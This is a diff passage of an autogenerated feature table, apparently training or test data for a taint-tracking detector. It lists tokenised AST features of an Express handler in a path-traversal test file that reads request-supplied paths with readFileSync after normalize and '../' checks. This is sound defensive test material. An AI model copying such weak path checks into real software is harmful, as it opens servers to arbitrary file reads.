workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:283:7:283:13 | newpath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:283:7:283:13 | newpath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:283:7:283:42 | newpath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:283:7:283:42 | newpath | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:283:7:283:42 | newpath | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:283:7:283:42 | newpath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:283:7:283:42 | newpath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:283:7:283:42 | newpath ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:283:7:283:42 | newpath ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:283:7:283:42 | newpath ... e(path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:283:7:283:42 | newpath ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:283:7:283:42 | newpath ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:283:17:283:26 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:283:17:283:26 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:283:17:283:26 | pathModule | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:283:17:283:26 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:283:17:283:26 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:283:17:283:36 | pathModule.normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:283:17:283:36 | pathModule.normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:283:17:283:36 | pathModule.normalize | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:283:17:283:36 | pathModule.normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:283:17:283:36 | pathModule.normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:283:17:283:42 | exceptional return of pathMod ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:283:17:283:42 | exceptional return of pathMod ... e(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:283:17:283:42 | exceptional return of pathMod ... e(path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:283:17:283:42 | exceptional return of pathMod ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:283:17:283:42 | exceptional return of pathMod ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:283:17:283:42 | pathMod ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:283:17:283:42 | pathMod ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:283:17:283:42 | pathMod ... e(path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:283:17:283:42 | pathMod ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:283:17:283:42 | pathMod ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:283:28:283:36 | normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:283:28:283:36 | normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:283:28:283:36 | normalize | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:283:28:283:36 | normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:283:28:283:36 | normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:283:38:283:41 | path | CalleeFlexibleAccessPath | pathModule.normalize | | autogenerated/TaintedPath/normalizedPaths.js:283:38:283:41 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:283:38:283:41 | path | calleeImports | path | @@ -9141,6 +77056,61 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:283:38:283:41 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:283:38:283:41 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:283:38:283:41 | path | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:284:7:284:18 | relativePath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:284:7:284:18 | relativePath | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:284:7:284:18 | relativePath | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:284:7:284:18 | relativePath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:284:7:284:18 | relativePath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:284:7:284:85 | relativ ... ewpath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:284:7:284:85 | relativ ... ewpath) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:284:7:284:85 | relativ ... ewpath) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:284:7:284:85 | relativ ... ewpath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:284:7:284:85 | relativ ... ewpath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:284:7:284:85 | relativePath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:284:7:284:85 | relativePath | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:284:7:284:85 | relativePath | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:284:7:284:85 | relativePath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:284:7:284:85 | relativePath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:284:22:284:31 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:284:22:284:31 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:284:22:284:31 | pathModule | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:284:22:284:31 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:284:22:284:31 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:284:22:284:40 | pathModule.relative | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:284:22:284:40 | pathModule.relative | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:284:22:284:40 | pathModule.relative | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:284:22:284:40 | pathModule.relative | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:284:22:284:40 | pathModule.relative | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:284:22:284:85 | exceptional return of pathMod ... ewpath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:284:22:284:85 | exceptional return of pathMod ... ewpath) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:284:22:284:85 | exceptional return of pathMod ... ewpath) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:284:22:284:85 | exceptional return of pathMod ... ewpath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:284:22:284:85 | exceptional return of pathMod ... ewpath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:284:22:284:85 | pathMod ... ewpath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:284:22:284:85 | pathMod ... ewpath) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:284:22:284:85 | pathMod ... ewpath) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:284:22:284:85 | pathMod ... ewpath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:284:22:284:85 | pathMod ... ewpath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:284:33:284:40 | relative | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:284:33:284:40 | relative | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:284:33:284:40 | relative | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:284:33:284:40 | relative | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:284:33:284:40 | relative | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:284:42:284:51 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:284:42:284:51 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:284:42:284:51 | pathModule | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:284:42:284:51 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:284:42:284:51 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:284:42:284:61 | pathModule.normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:284:42:284:61 | pathModule.normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:284:42:284:61 | pathModule.normalize | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:284:42:284:61 | pathModule.normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:284:42:284:61 | pathModule.normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:284:42:284:75 | exceptional return of pathMod ... aceDir) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:284:42:284:75 | exceptional return of pathMod ... aceDir) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:284:42:284:75 | exceptional return of pathMod ... aceDir) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:284:42:284:75 | exceptional return of pathMod ... aceDir) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:284:42:284:75 | exceptional return of pathMod ... aceDir) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:284:42:284:75 | pathMod ... aceDir) | CalleeFlexibleAccessPath | pathModule.relative | | autogenerated/TaintedPath/normalizedPaths.js:284:42:284:75 | pathMod ... aceDir) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:284:42:284:75 | pathMod ... aceDir) | calleeImports | path | @@ -9150,6 +77120,11 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:284:42:284:75 | pathMod ... aceDir) | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:284:42:284:75 | pathMod ... aceDir) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:284:42:284:75 | pathMod ... aceDir) | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:284:53:284:61 | normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:284:53:284:61 | normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:284:53:284:61 | normalize | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:284:53:284:61 | normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:284:53:284:61 | normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:284:63:284:74 | workspaceDir | CalleeFlexibleAccessPath | pathModule.normalize | | autogenerated/TaintedPath/normalizedPaths.js:284:63:284:74 | workspaceDir | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:284:63:284:74 | workspaceDir | calleeImports | path | @@ -9168,6 +77143,46 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:284:78:284:84 | newpath | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:284:78:284:84 | newpath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:284:78:284:84 | newpath | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:285:7:285:16 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:285:7:285:16 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:285:7:285:16 | pathModule | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize 